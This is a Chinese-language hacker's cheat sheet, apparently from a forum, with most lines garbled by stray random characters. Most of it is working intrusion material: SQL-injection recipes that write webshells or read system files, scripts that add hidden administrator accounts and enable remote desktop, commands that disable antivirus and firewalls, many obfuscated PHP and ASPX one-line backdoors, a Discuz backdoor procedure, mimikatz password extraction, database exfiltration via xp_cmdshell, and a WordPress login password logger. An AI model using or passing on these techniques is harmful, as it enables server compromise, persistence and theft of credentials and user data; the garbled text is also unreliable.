+ l: B" t/ c! O9 \3 W! J; z' i$ V+ ?( c7 Y5 H0 ]
use test;4 m) e: r. I( Z) U; c" X
create table a (cmd text);- S% ^5 x, A. [
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); ^+ @$ ], E+ _. W! H- k& m
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );7 G5 m, B9 N/ j7 }
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );! X, C3 P7 Q! `4 v
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";9 ^) o+ r g {: [! d, E) ? S
drop table a;2 j: P/ T+ J2 ]; U/ w
. k4 e) F5 [0 z
英文版本:
9 h) f ~. B' _/ Z9 B$ m6 c% @1 Z0 X% T n' o4 [# n
use test;
; k: u5 g+ W5 m1 dcreate table a (cmd text);
( w! H, l; f5 e f3 b% J- Qinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
* f& G6 s/ s/ a! \' ]9 q2 f' Tinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );& w2 r( W- G# h5 z, u/ T$ b
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );- p( p1 P2 x6 d) o) T
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
; @8 R; F& n7 L- N4 k. Jdrop table a;- X$ H( X ~ s* W- o
4 `: s( p, Z( j2 ]; N
create table a (cmd BLOB);" p5 ~ z1 Q5 x; F) J
insert into a values (CONVERT(木马的16进制代码,CHAR));
: T" ~4 R6 e! Lselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
) y, O7 h2 X) p5 }* C. l- p8 j$ ^drop table a;# A/ k U' d, x: ?' k+ r
4 Y; e2 j0 i2 A6 T记录一下怎么处理变态诺顿; g! |% s9 j& N
查看诺顿服务的路径
, w) a P( P& F' i3 Esc qc ccSetMgr
; W4 x" L! ~& T: e5 O8 O# k然后设置权限拒绝访问。做绝一点。。
( X/ `8 @& @4 I9 i6 p n4 _' x: ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system- _3 u0 ~0 m' O1 B( }* ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
! E5 j# k* a7 Q) Q5 `9 Gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
9 B, l" q) `% Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone4 f( T6 f' n3 `! Z a, M6 R4 j) S% V
$ `- b5 E8 U3 z2 O ?" b/ x; y8 y$ m然后再重启服务器 E4 r# X# p: j; _, l
iisreset /reboot0 N7 Q% c/ t5 B% _' _
这样就搞定了。。不过完事后。记得恢复权限。。。。
) w5 l: B. K/ G: E( scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
6 E( A- A) q. ?7 u5 z* Zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
2 Y/ ~% D9 v3 lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F6 b: f, X2 E+ M% z* `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
& G- i' o h% ^8 t. M' GSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin6 D5 p0 j; O4 Q
3 f7 o4 M0 M5 ]" sEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')* ]& [% k: ?. V; _( o, c
3 p w9 Q& ~2 I- t
postgresql注射的一些东西6 X! e' ]: d o6 c, g2 g; z
如何获得webshell
2 L! U$ t; Z& N+ r) g4 \5 hhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
9 f& Q4 i$ A! l3 X: t; C9 P. Vhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
9 c7 x* o7 v5 e: U, t- b- m6 O- o1 khttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
, T/ B0 p; u9 q( N! j如何读文件
3 K. M& G3 p8 }http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);8 w3 }' |4 c- V4 ]
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;3 c% _1 E3 F, r2 P
http://127.0.0.1/postgresql.php?id=1;select * from myfile;- S$ g! t, t1 C2 Q! b6 F
, J( s4 H& G# Z7 _- rz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
n* ]" L `% |' F+ S当然,这些的postgresql的数据库版本必须大于8.X
4 ~2 c3 E# `/ w& I2 c- S创建一个system的函数:3 n- F7 V5 A: a7 j2 C, C
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT! H% E8 s5 c5 e
1 j: S4 a3 b& C Z- R% V' W5 ?9 ^/ V
创建一个输出表:
4 k& H( |% Q' D! ZCREATE TABLE stdout(id serial, system_out text)
8 H- U6 I, S4 q7 d, N; \1 Z5 T, u1 d3 O' E, y0 |3 N& V; K
执行shell,输出到输出表内:
/ S7 O" @0 v, H3 N3 l5 [5 ySELECT system('uname -a > /tmp/test')
" a* X4 Q( k! _# O: _ R
1 A l% ]" D3 v3 _0 K3 k" b* Lcopy 输出的内容到表里面;+ q q- [1 ^2 Y; D& N
COPY stdout(system_out) FROM '/tmp/test'' c% k, O( }% \( \/ e
: b" g6 [% R( ^从输出表内读取执行后的回显,判断是否执行成功2 e7 o7 a7 Q: R& p) f P
. b7 ^6 J* I$ ^( D! G( Y; MSELECT system_out FROM stdout% R5 x$ h! ^6 H; _
下面是测试例子
3 T% o- |& `$ i8 M+ x1 U
! A) N8 N& ~6 x: O/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
& o3 J" K/ p2 k
8 h/ a Z* v% `, ^: x9 o+ Z( M. X" F/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
1 p% q+ a2 t+ n4 k' |0 f- l' qSTRICT --" k0 I" K# C2 ]
6 T& l3 o/ h1 d6 W9 [6 A5 I+ p5 o/store.php?id=1; SELECT system('uname -a > /tmp/test') --
& c# p/ p3 P+ L9 ?: n" w$ N. z" M
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
: H8 |3 \% U9 ?" W0 U/ ^; k) v: \/ z; V1 X u
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--7 i" _* Y# ?' I, T* m- ?4 [
net stop sharedaccess stop the default firewall
% D# f }; y) L9 Snetsh firewall show show/config default firewall
- T9 P( p7 w. n) T1 i7 O" }netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall/ p" _& ^$ u; Y2 f1 T# K
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
1 c3 }' k3 ?. k) p修改3389端口方法(修改后不易被扫出)
; x: I0 ]" B I" q- h# f8 d/ O修改服务器端的端口设置,注册表有2个地方需要修改
. @) L. e- {/ M) n. {4 C) E
' ~; A" G; `* V4 h- j; G, v2 [/ q[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
7 G/ o3 m* E/ q/ z% yPortNumber值,默认是3389,修改成所希望的端口,比如6000
& |$ m2 g' d6 ?% u: X& ]
# {/ ?3 U; ]9 ~# z4 r9 R第二个地方:3 R9 X0 K P5 j; g
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
( z1 @1 h; p5 }2 V5 |# k/ qPortNumber值,默认是3389,修改成所希望的端口,比如6000. J: v: [5 v! M6 ~/ g& `3 ~
' L" u2 d) p' |; h9 X; l9 G6 y
现在这样就可以了。重启系统就可以了
1 @& G- x) Q6 U8 H& G2 X" i: H' H/ E f0 j
查看3389远程登录的脚本; A) c% d h( r$ C, r0 P- _
保存为一个bat文件
; h6 Y& S$ b. Q# }3 l5 T+ Bdate /t >>D:\sec\TSlog\ts.log d p# F1 Y/ T: L
time /t >>D:\sec\TSlog\ts.log
) h) u/ y: P6 wnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log3 k! Z) z; y* |7 h3 U' L' q# F
start Explorer
6 z- R% _+ B1 E* T. Q! }( k' d. y& [) }
mstsc的参数:
3 J9 j: u1 r7 o1 `
' e) o4 @' a! ~& E( |( H远程桌面连接( I- x: M* B3 s' b7 r$ A5 C
* ?" i. P$ \; c c
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]3 [, q2 c% u& M4 ]* Q C2 C! Z
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?( H% {! n0 W: Q8 P8 ~$ F5 B( ], W+ V
! a5 I6 E7 Y! r* c+ w<Connection File> -- 指定连接的 .rdp 文件的名称。' e, f2 _' C4 X+ ~" t: M
6 B& \3 i, [' V# R0 h/v:<server[:port]> -- 指定要连接到的终端服务器。3 m" {" T! ^. O# `' F
" Z' P; b( K7 }% k/ c) `8 Z2 q
/console -- 连接到服务器的控制台会话。
9 s* F( W9 o; o1 }1 l% r/ _
+ T5 f0 C# Y, ?' c, H$ Q, c- e- n1 Q/f -- 以全屏模式启动客户端。
* {9 X- o- p% U& E6 A4 A; G* o# A% n6 [
/w:<width> -- 指定远程桌面屏幕的宽度。3 V3 H0 G6 C- G, x" w
/ B% ]% Y# G$ Y/ t& M' w
/h:<height> -- 指定远程桌面屏幕的高度。7 {9 i; g, u# G9 @3 }: Z9 y
; H B" H5 u3 f4 K) K. k
/edit -- 打开指定的 .rdp 文件来编辑。
* X4 Z4 }/ z( b( x- z/ T4 F' M/ \# J7 R& Y/ S
/migrate -- 将客户端连接管理器创建的旧版
/ `5 X5 x4 w. ?9 `6 s连接文件迁移到新的 .rdp 连接文件。% J" I, u2 D% U/ {; K
$ _3 F5 M& `9 Q& |
# T" y& U2 S( x# l, {2 r
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就3 ^1 |& v: \: b) [8 m# M0 L6 }
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
% b. @# _5 G5 p, | B
' `/ I0 D7 G; k4 p命令行下开启3389& O' Z- a. e9 W4 h5 W4 ? B& n9 z/ c
net user asp.net aspnet /add
4 D! x( d7 X( u. J onet localgroup Administrators asp.net /add% h% _. b5 P- \$ M
net localgroup "Remote Desktop Users" asp.net /add: ?& q0 q6 S) W4 r% l4 Z: Y2 W
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
; L; y4 O, U A5 U; V0 ]6 a' kecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 04 n0 P7 `+ y: v# Q S+ u) ?
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
+ R5 f, ~, T7 T4 p5 X8 O7 I& a% Yecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f0 h+ Z" {# v2 {+ s/ u6 T5 i e
sc config rasman start= auto
% P! q/ ]: `0 G# Qsc config remoteaccess start= auto
+ b3 i4 Y3 V: i8 V7 H+ \! Z# mnet start rasman
; D/ W* N e2 L% b9 J+ T8 W2 N: v# anet start remoteaccess3 i8 O6 i& E# v8 ~* }
Media
, _2 R' T {0 p8 M7 \! ^& [<form id="frmUpload" enctype="multipart/form-data"6 N; v0 v: D, l9 P' m X7 J
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
- W1 M* C$ B/ j5 `, V+ N, ^- l<input type="file" name="NewFile" size="50"><br>% H' [8 t9 v& d' R7 ~ o7 @- Q
<input id="btnUpload" type="submit" value="Upload">
f# c. K5 p4 T# e! F</form>" q H. a. r2 }7 E6 E
( g B" j& K. o# b" |+ a! Hcontrol userpasswords2 查看用户的密码+ J( q( l! z8 I0 m3 Y- R
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径% p8 B4 v; N4 R) K- K
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a: Y- L1 @4 }' T; u
/ x# A7 q; r8 l( L% w% x141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
- `" _; u& t2 p% F, r! ]测试1:
) M$ t7 \- `$ P) qSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t12 L1 t9 |( f! u* ^2 y/ q
" u% {0 _/ R) h3 x5 F/ g
测试2:
; u5 ?( f- y- |/ z9 O$ p( s$ I% W0 H6 v3 W& a9 i& y6 `- T( k
create table dirs(paths varchar(100),paths1 varchar(100), id int)% {, G- o) o1 l7 Q8 }$ [7 Q
# U( q2 a! @) G; V$ r7 q
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
% f0 u6 ?8 d0 _% K0 V1 m( w
( O" N" h+ k3 g! s- FSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! D$ Q( u- x3 Y1 Z关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令5 H8 W! \: q7 p5 R; @, y4 A: Y
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
# z. F7 S$ f7 n/ y! F$ mnet stop mcafeeframework
) `5 k5 n# v) P5 [1 Qnet stop mcshield
9 n, J+ K" ^% E" D! C& o Enet stop mcafeeengineservice
+ D+ Z9 z4 N9 I; hnet stop mctaskmanager( Q( p- ` h& z4 ^1 W! M/ Q
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
$ x2 S: N. b) [+ y( K
* D3 y5 Q; c/ V. i' i' t VNCDump.zip (4.76 KB, 下载次数: 1)
! X4 g: Y) Z2 F2 A% x密码在线破解http://tools88.com/safe/vnc.php/ T: N! h5 K z
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
8 U4 n3 e- W3 D# P. ?( y* }+ |5 I5 i( o2 s9 e0 A$ Z
exec master..xp_cmdshell 'net user'5 v2 ?8 X! W( ~2 j
mssql执行命令。
; q( P- O9 W, M( |" l& a获取mssql的密码hash查询
1 \3 ]) d! J( ?! d; Gselect name,password from master.dbo.sysxlogins
0 M$ N( B2 j2 @- Q% j1 X I/ b- n1 c I# [, @
backup log dbName with NO_LOG;# a' a8 z& U4 B; F4 P, U
backup log dbName with TRUNCATE_ONLY;' e5 [! E3 l8 _6 E3 Y1 J. `6 O1 K4 @
DBCC SHRINKDATABASE(dbName);1 J' W Y/ {6 F* Q+ Q" P6 l
mssql数据库压缩
9 {7 W! `6 P9 Y$ s/ R' e" m6 h6 G: w" g. q
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
5 y- E( W% N: k% r将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
8 K! ?# e: t# W8 K4 c; x5 x6 a1 {
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'$ ^/ t/ ]) Q+ U2 @ k- D
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak$ B8 O0 d) Y+ A V% I; g8 q
7 M! Y0 b, R; `& M. P
Discuz!nt35渗透要点:
1 u- W$ z J K0 Q(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default4 S4 W$ f8 q0 |
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
1 r# s9 p, l9 }(3)保存。
& i4 `% r; X1 k2 o(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass+ n) N" b6 X& Q
d:\rar.exe a -r d:\1.rar d:\website\7 X, e) w7 p0 b( M* {& ^
递归压缩website" Q( p, d0 E/ Z) J- n! D) z
注意rar.exe的路径8 B u0 o" l1 o9 X ~
5 u* J( Y4 i: W# a; Y+ s<?php E2 {# y, H0 i6 @# O
$ F. D4 n! j4 {9 z$telok = "0${@eval($_POST[xxoo])}";
) N; M5 Y7 n' _+ Y( M
: E" X8 ~3 U# J9 t0 A$username = "123456";
, {8 K Z7 b9 ^" b; c+ ^* K. W! [! g B/ u' Z o0 ~2 J
$userpwd = "123456";, ~- J \- p0 u1 X
* q, w _1 z7 B7 c9 }/ r6 \
$telhao = "123456";
8 C4 z3 p5 p( j# _! C- U( b5 E* i) _& H9 s; y
$telinfo = "123456";
0 P( K& g0 B2 [8 G7 C3 J9 \6 |2 {+ X
?>0 E) z7 t; _7 N* p3 Q; z
php一句话未过滤插入一句话木马1 @ h b& ^6 [; t7 Q8 Y; G
7 ?- F9 a ?/ M2 x+ y- q站库分离脱裤技巧6 v E7 J8 @( H0 S+ K* M
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
" |! Y: P$ b- k- P5 wexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
# ~/ a3 D) ]+ J! U0 W条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。2 Z( K0 O# B8 j9 @; J
这儿利用的是马儿的专家模式(自己写代码)。
4 T+ ]2 m5 o: M: Mini_set('display_errors', 1);) ^: Q4 K- W. e
set_time_limit(0);3 ?6 U, g Q+ P
error_reporting(E_ALL);3 C4 b/ c8 Y& h) s" W5 K5 L! E
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
# }3 [! M% D" U2 Emysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());) J! ^4 T( m3 D3 s
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
* J/ O; ^; M) ]. A$i = 0;
* I2 S' L0 [) c4 m; ?+ h+ @$tmp = '';& X% h K a: ^! @( r6 g+ u
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {* T( w1 D' k( Z( \
$i = $i+1;. e$ a; U {& B8 z
$tmp .= implode("::", $row)."\n";
/ E) n1 ], r! m1 \& b if(!($i%500)){//500条写入一个文件
2 w0 z6 `- d' V $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';. R% w6 h+ @# R, \" `# j
file_put_contents($filename,$tmp);; F M7 O& G$ O; C4 b6 V/ [3 T& w
$tmp = '';
# o8 @; `) X! m5 J0 z7 v# ]& R4 b }: O5 ?+ b* e5 N1 t/ k) `" z
}
: P3 O$ A% s4 @1 _3 V# |mysql_free_result($result);
. N! X( F5 V% I' I: ~; T2 W
2 x1 t$ m. H) Y! J* `/ M/ E) l
7 x. o; o0 n( N! j+ E8 g& f2 l
: B3 _/ l' E5 F' p( ?0 o( B m//down完后delete! w3 M4 W5 Z( s. w
4 o1 K5 l2 e1 O5 k' h
1 Y2 b. O1 h! T6 [6 \+ u
ini_set('display_errors', 1);
' E" R( N6 o% Oerror_reporting(E_ALL);
1 N+ C. N2 ^6 h+ w4 O$i = 0;( O0 b- ~5 [9 [' O1 a4 i, w
while($i<32) {" Q' Y! n% X0 [( H' A
$i = $i+1;
3 T. |# X8 e( z( a& V! v $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';" i/ Z' x. s/ @9 S: O3 l3 T, K; p
unlink($filename);
4 \; ~( j4 P$ `. d# ~- H- d} 5 V X. V% ]0 p5 t/ s
httprint 收集操作系统指纹$ `9 l. e% H; |+ U* I3 e
扫描192.168.1.100的所有端口
: Q1 y$ ^9 b( D7 ~, L1 y+ G! @nmap –PN –sT –sV –p0-65535 192.168.1.100% l2 L2 G$ i6 q. T( D
host -t ns www.owasp.org 识别的名称服务器,获取dns信息/ j+ x0 z7 c4 T$ @
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输6 ]- J" K1 j+ l" K! d4 I# a" L
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host; ^+ Y/ o) t. R) \
; j b: J7 l4 J/ {Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
7 f' w2 P3 k' m; d9 K! }* F z- |5 Z) H- W- T' Y# S
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
9 n) S$ P8 |$ b {: X
3 ]" T. W3 y" X2 J Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x$ c; k# o' k4 Q* x8 b6 k
% G$ w9 V4 o; e: c7 Z8 S+ m DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)- W4 s b: Z& Q6 s& y7 o0 U
1 g# Y4 A3 t; e( t1 Q0 G, S; q7 E
http://net-square.com/msnpawn/index.shtml (要求安装)" E6 h& g5 m" O1 r( Q, R0 W0 R
/ W* j% j/ U1 U. a' u7 O: C3 W
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
2 i3 k& C3 Y3 f. ?; B# u, m' ?8 v; G8 M3 |/ K$ K; W
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
( i, }( ~& ~7 Z; Iset names gb2312
: {8 z& T9 K0 X4 @, T, H& C( B导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。; W+ i# V" |! ~8 s7 u) b
7 x# `& D! P+ |9 H
mysql 密码修改) N" G1 l& |: q, F
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
5 A! F# C9 E! i; s4 ~update user set password=PASSWORD('antian365.com') where user='root';
1 x* Y/ S! L9 k. _9 gflush privileges;
L" Y6 C9 T; f高级的PHP一句话木马后门: E; w- C9 ^% k
3 ?- z* y3 }# W5 o8 V- U# d: R6 C
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀/ G" X+ O" I1 U7 Q
: U( i3 ~0 K% Z9 y4 d' O
1、
( }- h& z* c5 m5 C8 t1 s
4 E* C0 P3 P$ K) z5 U+ P$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";; A& b/ g2 x4 T/ u/ F' f$ M2 F. b
- _ i' p: a& Q2 h' L" j' n$hh("/[discuz]/e",$_POST['h'],"Access");! |+ o; R+ y6 N3 d3 c( l9 M
u3 W& k7 Y3 f& ~3 [
//菜刀一句话
7 F* `( x/ ]1 S' T6 U2 d
+ c" {: K9 s% _6 b) n" O& b. n2、9 Q/ o3 t4 l9 H0 w; t @
5 e- ~7 A! j- g& j% o& ~$ `$filename=$_GET['xbid'];
# k) z! h7 s4 z/ y7 O
! C1 ?- y0 K' I& q% Z5 |include ($filename);
9 G3 T( X2 U$ n: H& L! m( F+ h3 }$ Q; U5 h
//危险的include函数,直接编译任何文件为php格式运行
; W3 Y) g' E* b' ]1 ]
2 r5 w8 }; ]* B/ g8 s) m3、9 S/ h+ {& A, H# k" @
6 k3 G8 p9 |2 L$reg="c"."o"."p"."y"; W& ]& K3 f2 i" N. g7 @3 i, N, J
; \2 }5 U1 q; y4 G1 z$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);( S: x1 }0 v5 r* E0 R3 g F
/ p- X4 d. ~8 ?; A- s
//重命名任何文件
2 V \$ x5 f/ l+ S- k$ L: q, L! F/ R7 c7 I8 l5 n
4、* L! | P! s N. H
6 e2 O4 P% v% H+ {7 V9 X2 b0 J0 \# d' \
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
/ g- ^6 l. b6 Z) }
3 C Z! ~" f+ @9 _2 {* P; o$gzid("/[discuz]/e",$_POST['h'],"Access");+ Q/ R; q3 z; U1 l
7 s( s* _1 P; F; C//菜刀一句话
( A8 Y3 j7 K3 _4 f+ N9 H0 M
6 d3 L% Y! E% k, u: ]$ X/ p5、include ($uid);
. e2 z! |6 A# _
2 { F3 H9 k6 J1 S# F//危险的include函数,直接编译任何文件为php格式运行,POST 6 I5 @1 Z" s3 S+ v( t
1 [, y5 \0 l( T. m% h8 E8 {
3 ^5 P5 F# N, a! y( i( p; w
//gif插一句话5 Y# @$ H9 v4 b7 N9 E, x1 k
" ^$ F: N6 j1 \" n& }/ \# `3 j
6、典型一句话( g k- s5 s& P( w: w6 W0 H
% M! ]4 d4 _7 j0 h. J
程序后门代码
8 i5 T* r9 @ E4 ~# H- S: i; a<?php eval_r($_POST[sb])?>
4 {7 }+ N* a. U: k; N6 V6 c程序代码
. `: g& X8 S" ^* c9 x" A3 L. ^<?php @eval_r($_POST[sb])?>
: f- r. |& p. w* H7 v$ R8 F" |//容错代码$ @' _+ Y3 G$ b9 n
程序代码) E9 P: a; j$ j K/ r
<?php assert($_POST[sb]);?>
5 {# a. [! w. p2 R: q$ F//使用lanker一句话客户端的专家模式执行相关的php语句
; u! F% B+ C; [. Y$ t7 V程序代码1 z, s1 }! X# k$ z
<?$_POST['sa']($_POST['sb']);?>
R/ T# E7 B! R# a9 e% N I程序代码
8 z/ D* q" k. W0 y! I; z3 U5 R<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>* g+ e) T$ J% a! P( {
程序代码- l' F, ?8 O U Q+ z# S
<?php. ?: r7 ~& d# H' i. r* d; c
@preg_replace("/[email]/e",$_POST['h'],"error");
B/ n& y% L' X$ b, ^?># \9 l& j" x7 w+ ?' p
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
$ ]9 B, D1 ^1 O E+ u程序代码
; Y4 q6 v! t0 i& Y8 A4 v' |0 L<O>h=@eval_r($_POST[c]);</O>( @/ X; q7 M. w! U1 V$ ^- b1 }" F
程序代码+ C" E. V& F( n) {7 d
<script language="php">@eval_r($_POST[sb])</script>
$ }7 Y0 M" v% `8 o+ J//绕过<?限制的一句话
" t; t" C2 k9 V$ K
6 C; A2 b, l' c- u" ]! z( Jhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip6 R- O' T1 h( {( h
详细用法:4 S ]. X' _- m' E, O( y7 \
1、到tools目录。psexec \\127.0.0.1 cmd
! _. o) I- T2 p3 ~1 U* m! S2、执行mimikatz4 l6 l7 ~9 s9 x
3、执行 privilege::debug
# ^% R$ ?, _ d) I& y: x. y1 Q4、执行 inject::process lsass.exe sekurlsa.dll9 r; S( m2 l* Q" Z) ~. j/ Z
5、执行@getLogonPasswords' e$ A, E' r: S$ c$ B
6、widget就是密码" b7 z( i; K2 l
7、exit退出,不要直接关闭否则系统会崩溃。
5 j; k" d8 g* n5 |' r3 ^* ~3 Z! t3 A; X: p" ?/ Z: Z2 D& D
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面9 ~% {, m% g6 v, ^) n# ?
2 j$ {5 G; v3 L X自动查找系统高危补丁
) e+ m" }# R* Y' L4 H8 @systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt% J) Y2 C1 |0 S# J. \! ?
1 z: G, O( g6 R, ^8 H& ], j) e突破安全狗的一句话aspx后门
- d2 ]. R. l" t# y8 N( ~<%@ Page Language="C#" ValidateRequest="false" %>2 y8 ~" p+ P. O1 F) y
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>$ x9 E" @7 ^3 ^! L% J Z3 \! f$ v
webshell下记录WordPress登陆密码
1 Z) j1 ] [5 [webshell下记录Wordpress登陆密码方便进一步社工
# N% b) v7 e5 R在文件wp-login.php中539行处添加:$ O9 `7 [* o8 C" N5 ~9 {
// log password T5 a$ G5 t, O" Z
$log_user=$_POST['log'];& o( h1 g% z" G5 y4 g$ A1 l
$log_pwd=$_POST['pwd'];. I) d' U1 t7 Q3 C! i! y
$log_ip=$_SERVER["REMOTE_ADDR"];
4 f/ U* F) |+ d9 x' u. i$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;% J$ b. M# B! h* m
$txt=$txt.”\r\n”;9 m" E) P9 J2 {8 M& g
if($log_user&&$log_pwd&&$log_ip){- h( ]& K" L0 O; g, q, j! ^( f+ }
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
! x3 b. l3 U" {9 t; D$ d2 S}; v0 o) h% Q& ^# u9 U& n2 q
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
. t2 ^ f" n$ y& \7 v就是搜索case ‘login’ d/ U f6 S- @# N( c. M+ |
在它下面直接插入即可,记录的密码生成在pwd.txt中,
/ K9 X! j$ S4 @% x其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录3 g* M: g s# W( d
